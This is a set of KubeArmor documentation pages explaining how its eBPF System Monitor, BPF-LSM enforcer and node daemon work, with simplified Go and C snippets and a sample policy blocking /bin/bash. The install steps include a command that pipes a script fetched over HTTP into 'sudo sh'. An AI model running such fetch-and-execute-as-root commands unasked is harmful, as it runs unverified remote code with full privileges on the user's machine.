    // Load the compiled BPF code (.o file) containing programs and map definitions
    objs := enforcerObjects{} // enforcerObjects corresponds to maps and programs in the BPF .o file
    if err := loadEnforcerObjects(&objs, nil); err != nil {
        return nil, fmt.Errorf("failed to load BPF objects: %w", err)
    }
    be.objs = objs // Store loaded objects

    // Attach programs to LSM hooks
    // The AttachLSM call links the BPF program to the kernel hook
    // be.objs.EnforceProc refers to the BPF program defined with SEC("lsm/bprm_check_security")
    link, err := link.AttachLSM(link.LSMOptions{Program: objs.EnforceProc})
    if err != nil {
        objs.Close()
        return nil, fmt.Errorf("failed to attach BPF program to LSM hook: %w", err)
    }
    // be.links = append(be.links, link) // Store link to manage it later (simplified)

    // Get references to the BPF maps defined in the C code
    // "kubearmor_containers" matches the map name in the BPF C code
    be.BPFContainerMap = objs.KubearmorContainers

    // ... Attach other programs (file, network, capabilities) ...
    // ... Setup ring buffer for alerts (like in monitoring) ...

    return be, nil
}

// AddContainerPolicies Function (simplified - conceptual)
func (be *BPFEnforcer) AddContainerPolicies(containerID string, pidns, mntns uint32, policies []tp.SecurityPolicy) error {
    // Translate KubeArmor policies (tp.SecurityPolicy) into a format
    // suitable for BPF map lookup (e.g., map of paths -> rule flags)
    // translatedRules := translatePoliciesToBPFRules(policies)

    // Create or get a reference to an inner map for this container (using BPF_MAP_TYPE_HASH_OF_MAPS)
    // The key for the outer map is the container's Namespace IDs
    outerKey := struct{ PidNS, MntNS uint32 }{pidns, mntns}

    // Conceptually:
    // innerMap, err := bpf.CreateMap(...) // Create inner map if it doesn't exist
    // err = be.BPFContainerMap.Update(outerKey, uint32(innerMap.FD()), ebpf.UpdateAny) // Link outer key to inner map FD

    // Populate the inner map with the translated rules
    // for path, ruleFlags := range translatedRules {
    //     ruleData := struct{ ProcessMask, FileMask uint8 }{...} // Map ruleFlags to data_t
    //     err = innerMap.Update(path, ruleData, ebpf.UpdateAny)
    // }

    // Simplified Update (directly indicating container exists with rules)
    containerMapValue := uint32(1) // Placeholder value
    if err := be.BPFContainerMap.Update(outerKey, containerMapValue, ebpf.UpdateAny); err != nil {
         return fmt.Errorf("failed to update BPF container map: %w", err)
    }


    be.Logger.Printf("Loaded BPF-LSM policies for container %s (pidns:%d, mntns:%d)", containerID, pidns, mntns)
    return nil
}

Explanation:

  • loadEnforcerObjects: Loads the compiled BPF enforcement code.

  • link.AttachLSM: Attaches a specific BPF program (objs.EnforceProc) to a named kernel LSM hook (lsm/bprm_check_security).

  • be.BPFContainerMap = objs.KubearmorContainers: Gets a handle (reference) to the BPF map defined in the C code. This handle allows the Go program to interact with the map in the kernel.

  • AddContainerPolicies: This conceptual function shows how KubeArmor translates high-level policies into a kernel-friendly format (e.g., flags like RULE_DENY, RULE_EXEC) and uses BPFContainerMap.Update to populate the maps. The Namespace IDs (pidns, mntns) are used as keys to ensure policies are applied to the correct container context.

This illustrates how KubeArmor uses user-space code to set up the BPF environment in the kernel, loading programs and populating maps. Once this is done, the BPF programs handle enforcement decisions directly within the kernel when events occur.

BPF Components Overview

BPF technology involves several key components:

Component
Description
Where it runs
KubeArmor Usage

BPF Programs

Small, safe programs written in a C-like language, compiled to BPF bytecode

Kernel

Monitor events, Enforce policies at hooks

BPF Hooks

Specific points in the kernel where BPF programs can be attached

Kernel

Entry/exit of syscalls, tracepoints, LSM hooks

BPF Maps

Efficient key-value data structures for sharing data

Kernel (accessed by both kernel BPF and user space)

Store policy rules, Store event data (ring buffer), Store identity info

BPF Verifier

Kernel component that checks BPF programs for safety before loading

Kernel

Ensures KubeArmor's BPF programs are safe

BPF JIT

Compiles BPF bytecode to native machine code for performance

Kernel

Makes KubeArmor's BPF operations fast

BPF Loader

User-space library/tool to compile C code, load programs/maps into kernel

User Space

KubeArmor Daemon uses cilium/ebpf library as loader

Conclusion

In this chapter, you've taken a deeper dive into BPF (eBPF), the powerful kernel technology that forms the backbone of KubeArmor's runtime security capabilities. You learned how eBPF enables KubeArmor to run small, safe, high-performance programs inside the kernel for both observing system events (System Monitor) and actively enforcing security policies at low level hooks (Runtime Enforcer via BPF-LSM). You saw how BPF Maps are used to share data and store policy rules efficiently in the kernel.

Understanding BPF highlights KubeArmor's modern, efficient approach to container and node security. In the next chapter, we'll bring together all the components we've discussed by looking at the central orchestrator on each node

System Monitor

Welcome back to the KubeArmor tutorial! In the previous chapters, we've built up our understanding of how KubeArmor defines security rules using Security Policies, how it figures out who is performing actions using Container/Node Identity, and how it configures the underlying OS to actively enforce those rules using the Runtime Enforcer.

But even with policies and enforcement set up, KubeArmor needs to constantly know what's happening inside your system. When a process starts, a file is accessed, or a network connection is attempted, KubeArmor needs to be aware of these events to either enforce a policy (via the Runtime Enforcer) or simply record the activity for auditing and visibility.

This is where the System Monitor comes in.

What is the System Monitor?

Think of the System Monitor as KubeArmor's eyes and ears inside the operating system on each node. While the Runtime Enforcer acts as the security guard making decisions based on loaded rules, the System Monitor is the surveillance system and log recorder that detects all the relevant activity.

Its main job is to:

  1. Observe: Watch for specific actions happening deep within the Linux kernel, like:

    • Processes starting or ending.

    • Files being opened, read, or written.

    • Network connections being made or accepted.

    • Changes to system privileges (capabilities).

  2. Collect Data: Gather detailed information about these events (which process, what file path, what network address, etc.).

  3. Add Context: Crucially, it correlates the low-level event data with the higher-level Container/Node Identity information KubeArmor maintains (like which container, pod, or node the event originated from).

  4. Prepare for Logging and Processing: Format this enriched event data so it can be sent for logging (via the Log Feeder) or used by other KubeArmor components.

The System Monitor uses advanced kernel technology, primarily eBPF, to achieve this low-overhead, deep visibility into system activities without requiring modifications to the applications or the kernel itself.

Why is Monitoring Important? A Use Case Example

Let's revisit our web server example. We have a policy to Block the web server container (app: my-web-app) from reading /etc/passwd.

  1. You apply the Security Policy.

  2. KubeArmor's Runtime Enforcer translates this policy and loads a rule into the kernel's security module (say, BPF-LSM).

  3. An attacker compromises your web server and tries to read /etc/passwd.

  4. The OS kernel intercepts this attempt (via the BPF-LSM hook configured by the Runtime Enforcer).

  5. Based on the loaded rule, the Runtime Enforcer's BPF program blocks the action.

So, the enforcement worked! The read was prevented. But how do you know this happened? How do you know someone tried to access /etc/passwd?

This is where the System Monitor is essential. Even when an action is blocked by the Runtime Enforcer, the System Monitor is still observing that activity.

When the web server attempts to read /etc/passwd:

  • The System Monitor's eBPF programs, also attached to kernel hooks, detect the file access attempt.

  • It collects data: the process ID, the file path (/etc/passwd), the type of access (read).

  • It adds context: it uses the process ID and Namespace IDs to look up in KubeArmor's internal map and identifies that this process belongs to the container with label app: my-web-app.

  • It also sees that the Runtime Enforcer returned an error code indicating the action was blocked.

  • The System Monitor bundles all this information (who, what, where, when, and the outcome - Blocked) and sends it to KubeArmor for logging.

Without the System Monitor, you would just have a failed system call ("Permission denied") from the application's perspective, but you wouldn't have the centralized, context-rich security alert generated by KubeArmor that tells you which container specifically tried to read /etc/passwd and that it was blocked by policy.

The System Monitor provides the crucial visibility layer, even for actions that are successfully prevented by enforcement. It also provides visibility for actions that are simply Audited by policy, or even for actions that are Allowed but that you want to monitor.

How the System Monitor Works (Under the Hood)

The System Monitor relies heavily on eBPF programs loaded into the Linux kernel. Here's a simplified flow:

  1. Initialization: When the KubeArmor Daemon starts on a node, its System Monitor component loads various eBPF programs into the kernel.

  2. Hooking: These eBPF programs attach to specific points (called "hooks") within the kernel where system events occur (e.g., just before a file open is processed, or when a new process is created).

  3. Event Detection: When a user application or system process performs an action (like open("/etc/passwd")), the kernel reaches the attached eBPF hook.

  4. Data Collection (in Kernel): The eBPF program at the hook executes. It can access information about the event directly from the kernel's memory (like the process structure, file path, network socket details). It also gets the process's Namespace IDs Container/Node Identity.

  5. Event Reporting (Kernel to User Space): The eBPF program packages the collected data (raw event + Namespace IDs) into a structure and sends it to the KubeArmor Daemon in user space using a highly efficient kernel mechanism, typically an eBPF ring buffer.

  6. Data Reception (in KubeArmor Daemon): The System Monitor component in the KubeArmor Daemon continuously reads from this ring buffer.

  7. Context Enrichment: For each incoming event, the System Monitor uses the Namespace IDs provided by the eBPF program to look up the corresponding Container ID, Pod Name, Namespace, and Labels in its internal identity map (the one built by the Container/Node Identity component). It also adds other relevant details like the process's current working directory and parent process.

  8. Log/Alert Generation: The System Monitor formats all this enriched information into a structured log or alert message.

  9. Forwarding: The formatted log is then sent to the Log Feeder component, which is responsible for sending it to your configured logging or alerting systems.

Here's a simple sequence diagram illustrating this:

This diagram shows how the eBPF programs in the kernel are the first point of contact for system events, collecting the initial data before sending it up to the KubeArmor Daemon for further processing, context addition, and logging.

Looking at the Code (Simplified)

Let's look at tiny snippets from the KubeArmor source code to see hints of how this works.

The eBPF programs (written in C, compiled to BPF bytecode) define the structure of the event data they send to user space. In KubeArmor/BPF/shared.h, you can find structures like event:

// KubeArmor/BPF/shared.h (Simplified)

typedef struct {
  u64 ts; // Timestamp

  u32 pid_id; // PID Namespace ID
  u32 mnt_id; // Mount Namespace ID

  // ... other process IDs (host/container) and UID ...

  u32 event_id; // Identifier for the type of event (e.g., file open, process exec)
  s64 retval;   // Return value of the syscall (useful for blocked actions)

  u8 comm[TASK_COMM_LEN]; // Process command name

  bufs_k data; // Structure potentially holding file path, source process path

  u64 exec_id; // Identifier for exec events
} event;

struct {
  __uint(type, BPF_MAP_TYPE_RINGBUF); // The type of map used for kernel-to-userspace communication
  __uint(max_entries, 1 << 24);
  __uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_events SEC(".maps"); // This is the ring buffer map

This shows the event structure containing key fields like timestamps, Namespace IDs (pid_id, mnt_id), the type of event (event_id), the syscall result (retval), the command name, and potentially file paths (data). It also defines the kubearmor_events map as a BPF_MAP_TYPE_RINGBUF, which is the mechanism used by eBPF programs in the kernel to efficiently send these event structures to the KubeArmor Daemon in user space.

On the KubeArmor Daemon side (in Go), the System Monitor component (KubeArmor/monitor/systemMonitor.go) reads from this ring buffer and processes the events.

// KubeArmor/monitor/systemMonitor.go (Simplified)

// SystemMonitor Structure (partially shown)
type SystemMonitor struct {
    // ... other fields ...

    // system events
    SyscallChannel chan []byte // Channel to receive raw event data
    SyscallPerfMap *perf.Reader // Reads from the eBPF ring buffer

    // PidID + MntID -> container id map (from Container/Node Identity)
    NsMap map[NsKey]string
    NsMapLock *sync.RWMutex

    // context + args
    ContextChan chan ContextCombined // Channel to send processed events

	// ... other fields ...
}

// TraceSyscall Function (Simplified)
func (mon *SystemMonitor) TraceSyscall() {
	if mon.SyscallPerfMap != nil {
		// Goroutine to read from the perf buffer (ring buffer)
		go func() {
			for {
				record, err := mon.SyscallPerfMap.Read() // Read raw event data from the ring buffer
				if err != nil {
                    // ... error handling ...
					return
				}
				// Send raw data to the processing channel
				mon.SyscallChannel <- record.RawSample
			}
		}()
	} else {
        // ... log error ...
		return
	}

    // Goroutine to process events from the channel
	for {
		select {
		case <-StopChan:
			return // Exit when told to stop

		case dataRaw, valid := <-mon.SyscallChannel: // Receive raw event data
			if !valid {
				continue
			}

			// Read the raw data into the SyscallContext struct
			dataBuff := bytes.NewBuffer(dataRaw)
			ctx, err := readContextFromBuff(dataBuff) // Helper to parse raw bytes
			if err != nil {
                // ... handle parse error ...
				continue
			}

            // Get argument data (file path, network address, etc.)
			args, err := GetArgs(dataBuff, ctx.Argnum) // Helper to parse arguments
			if err != nil {
                // ... handle args error ...
				continue
			}

			containerID := ""
			if ctx.PidID != 0 && ctx.MntID != 0 {
                // Use Namespace IDs from the event to look up Container ID in NsMap
				containerID = mon.LookupContainerID(ctx.PidID, ctx.MntID) // This uses the map from Chapter 2 context
			}

            // If lookup failed and it's a container NS, maybe replay (simplified out)
            // If it's host (PidID/MntID 0) or lookup succeeded...

            // Push the combined context (with ContainerID) to another channel for logging/policy processing
			mon.ContextChan <- ContextCombined{ContainerID: containerID, ContextSys: ctx, ContextArgs: args}
		}
	}
}

// LookupContainerID Function (from monitor/processTree.go - shown in Chapter 2 context)
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
    // ... implementation using NsMap map ...
    // This is where the correlation happens: Namespace IDs -> Container ID
}

// ContextCombined Structure (from monitor/systemMonitor.go)
type ContextCombined struct {
	ContainerID string // Added context from lookup
	ContextSys  SyscallContext // Raw data from eBPF
	ContextArgs []interface{} // Parsed arguments from raw data
}

This Go code shows:

  1. The SyscallPerfMap reading from the eBPF ring buffer in the kernel.

  2. Raw event data being sent to the SyscallChannel.

  3. A loop reading from SyscallChannel, parsing the raw bytes into a SyscallContext struct.

  4. Using ctx.PidID and ctx.MntID (Namespace IDs) to call LookupContainerID and get the containerID.

  5. Packaging the raw context (ContextSys), parsed arguments (ContextArgs), and the looked-up ContainerID into a ContextCombined struct.

  6. Sending the enriched ContextCombined event to the ContextChan.

This ContextCombined structure is the output of the System Monitor – it's the rich event data with identity context ready for the Log Feeder and other components.

Types of Events Monitored

The System Monitor uses different eBPF programs attached to various kernel hooks to monitor different types of activities:

Event Type
Monitored Activities
Primary Mechanism

Process

Process execution (execve, execveat), process exit (do_exit), privilege changes (setuid, setgid)

Tracepoints, Kprobes, BPF-LSM

File

File open (open, openat), delete (unlink, unlinkat, rmdir), change owner (chown, fchownat)

Kprobes, Tracepoints, BPF-LSM

Network

Socket creation (socket), connection attempts (connect), accepting connections (accept), binding addresses (bind), listening on sockets (listen)

Kprobes, Tracepoints, BPF-LSM

Capability

Use of privileged kernel features (capabilities)

BPF-LSM, Kprobes

Syscall

General system call entry/exit for various calls

Kprobes, Tracepoints

The specific hooks used might vary slightly depending on the kernel version and the chosen Runtime Enforcerconfiguration (AppArmor/SELinux use different integration points than pure BPF-LSM), but the goal is the same: intercept and report relevant system calls and kernel security hooks.

System Monitor and Other Components

The System Monitor acts as a fundamental data source:

  • It provides the event data that the Runtime Enforcer's BPF programs might check against loaded policies in the kernel (BPF-LSM case). Note that enforcement happens at the hook via the rules loaded by the Enforcer, but the Monitor still observes the event and its outcome.

  • It uses the mappings maintained by the Container/Node Identity component to add context to raw events.

  • It prepares and forwards structured event logs to the Log Feeder.

Essentially, the Monitor is the "observer" part of KubeArmor's runtime security. It sees everything, correlates it to your workloads, and reports it, enabling both enforcement (via the Enforcer's rules acting on these observed events) and visibility.

Conclusion

In this chapter, you learned that the KubeArmor System Monitor is the component responsible for observing system events happening within the kernel. Using eBPF technology, it detects file access, process execution, network activity, and other critical operations. It enriches this raw data with Container/Node Identity context and prepares it for logging and analysis, providing essential visibility into your system's runtime behavior, regardless of whether an action was allowed, audited, or blocked by policy.

Understanding the System Monitor and its reliance on eBPF is key to appreciating KubeArmor's low-overhead, high-fidelity approach to runtime security. In the next chapter, we'll take a deeper dive into the technology that powers this monitoring (and the BPF-LSM enforcer)

KubeArmor Daemon

Welcome back to the KubeArmor tutorial! In our journey so far, we've explored the key components that make KubeArmor work:

  • Security Policies: Your rulebooks for security.

  • Container/Node Identity: How KubeArmor knows who is doing something.

  • Runtime Enforcer: The component that translates policies into kernel rules and blocks forbidden actions.

  • System Monitor: KubeArmor's eyes and ears, observing system events.

  • BPF (eBPF): The powerful kernel technology powering much of the monitoring and enforcement.

In this chapter, we'll look at the KubeArmor Daemon. If the other components are like specialized tools or senses, the KubeArmor Daemon is the central brain and orchestrator that lives on each node. It brings all these pieces together, allowing KubeArmor to function as a unified security system.

What is the KubeArmor Daemon?

The KubeArmor Daemon is the main program that runs on every node (Linux server) where you want KubeArmor to provide security. When you install KubeArmor, you typically deploy it as a DaemonSet in Kubernetes, ensuring one KubeArmor Daemon pod runs on each of your worker nodes. If you're using KubeArmor outside of Kubernetes (on a standalone Linux server or VM), the daemon runs directly as a system service.

Think of the KubeArmor Daemon as the manager for that specific node. Its responsibilities include:

  • Starting and stopping all the other KubeArmor components (System Monitor, Runtime Enforcer, Log Feeder).

  • Communicating with external systems like the Kubernetes API server or the container runtime (Docker, containerd, CRI-O) to get information about running workloads and policies.

  • Building and maintaining the internal mapping for Container/Node Identity.

  • Fetching and processing Security Policies (KSP, HSP, CSP) that apply to the workloads on its node.

  • Instructing the Runtime Enforcer on which policies to load and enforce for specific containers and the host.

  • Receiving security events and raw data from the System Monitor.

  • Adding context (like identity) to raw events received from the monitor.

  • Forwarding processed logs and alerts to the Log Feeder for external consumption.

  • Handling configuration changes and responding to shutdown signals.

Without the Daemon, the individual components couldn't work together effectively to provide end-to-end security.

Why is the Daemon Needed? A Coordinated Use Case

Let's trace the journey of a security policy and a system event, highlighting the Daemon's role.

Imagine you want to protect a specific container, say a database pod with label app: my-database, by blocking it from executing the /bin/bash command. You create a KubeArmor Policy (KSP) like this:

# Simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-bash-in-db
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-database
  process:
    matchPaths:
      - path: /bin/bash
  action: Block

And let's say later, a process inside that database container actually attempts to run /bin/bash.

Here's how the KubeArmor Daemon on the node hosting that database pod orchestrates the process:

  1. Policy Discovery: The KubeArmor Daemon, which is watching the Kubernetes API server, detects your new block-bash-in-db policy.

  2. Identify Targets: The Daemon processes the policy's selector (app: my-database). It checks its internal state (built by talking to the Kubernetes API and container runtime) to find which running containers/pods on its node match this label. It identifies the specific database container.

  3. Prepare Enforcement: The Daemon takes the policy rule (Block /bin/bash) and tells its Runtime Enforcer component to load this rule specifically for the identified database container. The Enforcer translates this into the format needed by the underlying OS security module (AppArmor, SELinux, or BPF-LSM) and loads it into the kernel.

  4. System Event: A process inside the database container tries to execute /bin/bash.

  5. Event Detection & Enforcement: The OS kernel intercepts this action. If using BPF-LSM, the Runtime Enforcer's BPF program checks the loaded policy rules (which the Daemon put there). It sees the rule to Block /bin/bash for this container's identity. The action is immediately blocked by the kernel.

  6. Event Monitoring & Context: Simultaneously, the System Monitor's BPF programs also detect the exec attempt on /bin/bash. It collects details like the process ID, the attempted command, and the process's Namespace IDs. It sends this raw data to the Daemon (via a BPF ring buffer).

  7. Event Processing: The Daemon receives the raw event from the Monitor. It uses the Namespace IDs to look up the Container/Node Identity in its internal map, identifying that this event came from the database container (app: my-database). It sees the event includes an error code indicating it was blocked by the security module.

  8. Log Generation: The Daemon formats a detailed log/alert message containing all the information: the event type (process execution), the command (/bin/bash), the outcome (Blocked), and the workload identity (container ID, Pod Name, Namespace, Labels).

  9. Log Forwarding: The Daemon sends this formatted log message to its Log Feeder component, which then forwards it to your configured logging/monitoring system.

This diagram illustrates how the Daemon acts as the central point, integrating information flow and control between external systems (K8s, CRI), the low-level kernel components (Monitor, Enforcer), and the logging/alerting system.

The Daemon Structure

Let's look at the core structure representing the KubeArmor Daemon in the code. It holds references to all the components it manages and the data it needs.

Referencing KubeArmor/core/kubeArmor.go:

// KubeArmorDaemon Structure (Simplified)
type KubeArmorDaemon struct {
	// node information
	Node     tp.Node
	NodeLock *sync.RWMutex

	// flag
	K8sEnabled bool

	// K8s pods, containers, endpoints, owner info
	// These map identity details collected from K8s/CRI
	K8sPods     []tp.K8sPod
	K8sPodsLock *sync.RWMutex
	Containers     map[string]tp.Container
	ContainersLock *sync.RWMutex
	EndPoints     []tp.EndPoint
	EndPointsLock *sync.RWMutex
	OwnerInfo map[string]tp.PodOwner

	// Security policies watched from K8s API
	SecurityPolicies     []tp.SecurityPolicy
	SecurityPoliciesLock *sync.RWMutex
	HostSecurityPolicies     []tp.HostSecurityPolicy
	HostSecurityPoliciesLock *sync.RWMutex

	// logger component
	Logger *fd.Feeder

	// system monitor component
	SystemMonitor *mon.SystemMonitor

	// runtime enforcer component
	RuntimeEnforcer *efc.RuntimeEnforcer

	// Used for managing background goroutines
	WgDaemon sync.WaitGroup

	// ... other fields for health checks, state agent, etc. ...
}

Explanation:

  • The KubeArmorDaemon struct contains fields like Node (details about the node it runs on), K8sEnabled (whether it's in a K8s cluster), and maps/slices to store information about K8sPods, Containers, EndPoints, and parsed SecurityPolicies. Locks (*sync.RWMutex) are used to safely access this shared data from multiple parts of the Daemon's logic.

  • Crucially, it has pointers to the other main components: Logger, SystemMonitor, and RuntimeEnforcer. This shows that the Daemon owns and interacts with instances of these components.

  • WgDaemon is a sync.WaitGroup used to track background processes (goroutines) started by the Daemon, allowing for a clean shutdown.

Daemon Lifecycle: Initialization and Management

When KubeArmor starts on a node, the KubeArmor() function in KubeArmor/main.go (which calls into KubeArmor/core/kubeArmor.go) initializes and runs the Daemon.

Here's a simplified look at the initialization steps within the KubeArmor() function:

// KubeArmor Function (Simplified)
func KubeArmor() {
	// create a daemon instance
	dm := NewKubeArmorDaemon()
	// dm is our KubeArmorDaemon object on this node

	// ... Node info setup (whether in K8s or standalone) ...

	// initialize log feeder component
	if !dm.InitLogger() {
		// handle error and destroy daemon
		return
	}
	dm.Logger.Print("Initialized KubeArmor Logger")

	// Start logger's background process to serve feeds
	go dm.ServeLogFeeds()

	// ... StateAgent, Health Server initialization ...

	// initialize system monitor component
	if cfg.GlobalCfg.Policy || cfg.GlobalCfg.HostPolicy { // Only if policy/hostpolicy is enabled
		if !dm.InitSystemMonitor() {
			// handle error and destroy daemon
			return
		}
		dm.Logger.Print("Initialized KubeArmor Monitor")

		// Start system monitor's background processes to trace events
		go dm.MonitorSystemEvents()

		// initialize runtime enforcer component
		// It receives the SystemMonitor instance because the BPF enforcer
		// might need info from the monitor (like pin paths)
		if !dm.InitRuntimeEnforcer(dm.SystemMonitor.PinPath) {
			dm.Logger.Print("Disabled KubeArmor Enforcer since No LSM is enabled")
		} else {
			dm.Logger.Print("Initialized KubeArmor Enforcer")
		}

		// ... Presets initialization ...
	}

	// ... K8s/CRI specific watching for Pods/Containers/Policies ...

	// wait for a while (initialization sync)

	// ... Policy and Pod watching (K8s specific) ...

	// listen for interrupt signals to trigger shutdown
	sigChan := GetOSSigChannel()
	<-sigChan // This line blocks until a signal is received

	// destroy the daemon (calls Close methods on components)
	dm.DestroyKubeArmorDaemon()
}

// NewKubeArmorDaemon Function (Simplified)
func NewKubeArmorDaemon() *KubeArmorDaemon {
	dm := new(KubeArmorDaemon)
	// Initialize maps, slices, locks, and component pointers to nil/empty
	dm.NodeLock = new(sync.RWMutex)
	dm.K8sPodsLock = new(sync.RWMutex)
	dm.ContainersLock = new(sync.RWMutex)
	dm.EndPointsLock = new(sync.RWMutex)
	dm.SecurityPoliciesLock = new(sync.RWMutex)
	dm.HostSecurityPoliciesLock = new(sync.RWMutex)
	dm.DefaultPosturesLock = new(sync.Mutex)
	dm.ActivePidMapLock = new(sync.RWMutex)
	dm.MonitorLock = new(sync.RWMutex)

	dm.Containers = map[string]tp.Container{}
	dm.EndPoints = []tp.EndPoint{}
	dm.OwnerInfo = map[string]tp.PodOwner{}
	dm.DefaultPostures = map[string]tp.DefaultPosture{}
	dm.ActiveHostPidMap = map[string]tp.PidMap{}
	// Pointers to components (Logger, Monitor, Enforcer) are initially nil
	return dm
}

// InitSystemMonitor Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitSystemMonitor() bool {
    // Create a new SystemMonitor instance, passing it data it needs
	dm.SystemMonitor = mon.NewSystemMonitor(
        &dm.Node, &dm.NodeLock, // Node info
        dm.Logger, // Reference to the logger
        &dm.Containers, &dm.ContainersLock, // Container identity info
        &dm.ActiveHostPidMap, &dm.ActivePidMapLock, // Host process identity info
        &dm.MonitorLock, // Monitor's own lock
    )
	if dm.SystemMonitor == nil {
		return false
	}

    // Initialize BPF inside the monitor
	if err := dm.SystemMonitor.InitBPF(); err != nil {
		return false
	}
	return true
}

// InitRuntimeEnforcer Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitRuntimeEnforcer(pinpath string) bool {
    // Create a new RuntimeEnforcer instance, passing it data/references
	dm.RuntimeEnforcer = efc.NewRuntimeEnforcer(
        dm.Node, // Node info
        pinpath, // BPF pin path from the monitor
        dm.Logger, // Reference to the logger
        dm.SystemMonitor, // Reference to the monitor (for BPF integration needs)
    )
	return dm.RuntimeEnforcer != nil
}

Explanation:

  • NewKubeArmorDaemon is like the constructor; it creates the Daemon object and initializes its basic fields and locks. Pointers to components like Logger, SystemMonitor, RuntimeEnforcer are initially zeroed.

  • The main KubeArmor() function then calls dedicated Init... methods on the dm object (like dm.InitLogger(), dm.InitSystemMonitor(), dm.InitRuntimeEnforcer()).

  • These Init... methods are responsible for creating the actual instances of the other components using their respective New... functions (e.g., mon.NewSystemMonitor()) and assigning the returned object to the Daemon's pointer field (dm.SystemMonitor = ...). They pass necessary configuration and references (like the Logger) to the components they initialize.

  • After initializing components, the Daemon starts goroutines (using go dm.SomeFunction()) for tasks that need to run continuously in the background, like serving logs, monitoring system events, or watching external APIs.

  • The main flow then typically waits for a shutdown signal (<-sigChan).

  • When a signal is received, dm.DestroyKubeArmorDaemon() is called, which in turn calls Close... methods on the components to shut them down gracefully.

This demonstrates the Daemon's role in the lifecycle: it's the entity that brings the other parts to life, wires them together by passing references, starts their operations, and orchestrates their shutdown.

Daemon as the Information Hub

The Daemon isn't just starting components; it's managing the flow of information:

  1. Policies In: The Daemon actively watches the Kubernetes API (or receives updates in non-K8s mode) for changes to KubeArmor policies. When it gets a policy, it stores it in its SecurityPolicies or HostSecurityPolicies lists and notifies the Runtime Enforcer to update the kernel rules for affected workloads.

  2. Identity Management: The Daemon watches Pod/Container/Node events from Kubernetes and the container runtime. It populates internal structures (like the Containers map) which are then used by the System Monitor to correlate raw kernel events with workload identity (Container/Node Identity). While the NsMap itself might live in the Monitor (as seen in Chapter 4 context), the Daemon is responsible for gathering the initial K8s/CRI data needed to populate that map.

  3. Events Up: The System Monitor constantly reads raw event data from the kernel (via BPF ring buffer). It performs the initial lookup using the Namespace IDs and passes the enriched events (likely via Go channels, as hinted in Chapter 4 code) back to the Daemon or a component managed by the Daemon (like the logging pipeline within the Feeder).

  4. Logs Out: The Daemon (or its logging pipeline) takes these enriched events and passes them to the Log Feeder component. The Log Feeder is then responsible for sending these logs/alerts to the configured output destinations.

The Daemon acts as the central switchboard, ensuring that policies are delivered to the enforcement layer, that kernel events are enriched with workload context, and that meaningful security logs and alerts are generated and sent out.

Daemon Responsibilities Summary

Responsibility
What it Does
Interacts With

Component Management

Starts, stops, and manages the lifecycle of Monitor, Enforcer, Logger.

System Monitor, Runtime Enforcer, Log Feeder

External Comm.

Watches K8s API for policies & workload info; interacts with CRI.

Kubernetes API Server, Container Runtimes (Docker, containerd, CRI-O)

Identity Building

Gathers data (Labels, Namespaces, Container IDs, PIDs, NS IDs) to map low-level events to workloads.

Kubernetes API Server, Container Runtimes, OS Kernel (/proc)

Policy Processing

Fetches policies, identifies targeted workloads on its node.

Kubernetes API Server, Internal state (Identity)

Enforcement Orchest.

Tells the Runtime Enforcer which policies to load for which workload.

Runtime Enforcer, Internal state (Identity, Policies)

Event Reception

Receives raw or partially processed events from the Monitor.

System Monitor (via channels/buffers)

Event Enrichment

Adds full workload identity and policy context to incoming events.

System Monitor, Internal state (Identity, Policies)

Logging/Alerting

Formats events into structured logs/alerts and passes them to the Log Feeder.

Log Feeder, Internal state (Enriched Events)

Configuration/Signal

Reads configuration, handles graceful shutdown requests.

Configuration files/API, OS Signals

This table reinforces that the Daemon is the crucial integration layer on each node.

Conclusion

In this chapter, you learned that the KubeArmor Daemon is the core process running on each node, serving as the central orchestrator for all other KubeArmor components. It's responsible for initializing, managing, and coordinating the System Monitor (eyes/ears), Runtime Enforcer (security guard), and Log Feeder (reporter). You saw how it interacts with Kubernetes and container runtimes to understand Container/Node Identity and fetch Security Policies, bringing all the pieces together to enforce your security posture and report violations.

Understanding the Daemon's central role is key to seeing how KubeArmor operates as a cohesive system on each node. In the final chapter, we'll focus on where all the security events observed by the Daemon and its components end up

Harden Infrastructure

KubeArmor is a security solution for the Kubernetes and cloud native platforms that helps protect your workloads from attacks and threats. It does this by providing a set of hardening policies that are based on industry-leading compliance and attack frameworks such as CIS, MITRE, NIST-800-53, and STIGs. These policies are designed to help you secure your workloads in a way that is compliant with these frameworks and recommended best practices.

One of the key features of KubeArmor is that it provides these hardening policies out-of-the-box, meaning that you don't have to spend time researching and configuring them yourself. Instead, you can simply apply the policies to your workloads and immediately start benefiting from the added security that they provide.

Additionally, KubeArmor presents these hardening policies in the context of your workload, so you can see how they will be applied and what impact they will have on your system. This allows you to make informed decisions about which policies to apply, and helps you understand the trade-offs between security and functionality.

Overall, KubeArmor is a powerful tool for securing your Kubernetes workloads, and its out-of-the-box hardening policies based on industry-leading compliance and attack frameworks make it easy to get started and ensure that your system is as secure as possible.

What is the source of these hardening policies?

The rules in hardening policies are based on inputs from:

  1. Several others...

How to fetch hardening policies?

Pre-requisites:

  1. Install KubeArmor

    • curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin && karmor install

  2. Get the hardening policies in context of all the deployment in namespace NAMESPACE:

    • karmor recommend -n NAMESPACE

    • The recommended policies would be available in the out folder.

Sample recommended hardening policies

Key highlights:

  1. The hardening policies are available by default in the out folder separated out in directories based on deployment names.

  2. Get an HTML report by using the option --report report.html with karmor recommend.

  3. Get hardening policies in context to specific compliance by specifying --tag <CIS/MITRE/...> option.

Application Behavior

KubeArmor has visibility into systems and application behavior. KubeArmor summarizes/aggregates the information and provides a user-friendly view to figure out the application behavior.

What application behavior is shown?

  • Process data:

    • What are the processes executing in the pods?

    • What processes are executing through which parent processes?

  • File data:

    • What are the file system accesses made by different processes?

  • Network Accesses:

    • What are the Ingress/Egress connections from the pod?

    • What server binds are done in the pod?

How to get the application behavior?

Get visibility into process executions in default namespace.

Log Feeder

Welcome back to the KubeArmor tutorial! In the previous chapters, we've learned how KubeArmor defines security rules using Security Policies, identifies workloads using Container/Node Identity, enforces policies with the Runtime Enforcer, and observes system activity with the System Monitor, all powered by the underlying BPF (eBPF) technology and orchestrated by the KubeArmor Daemon on each node.

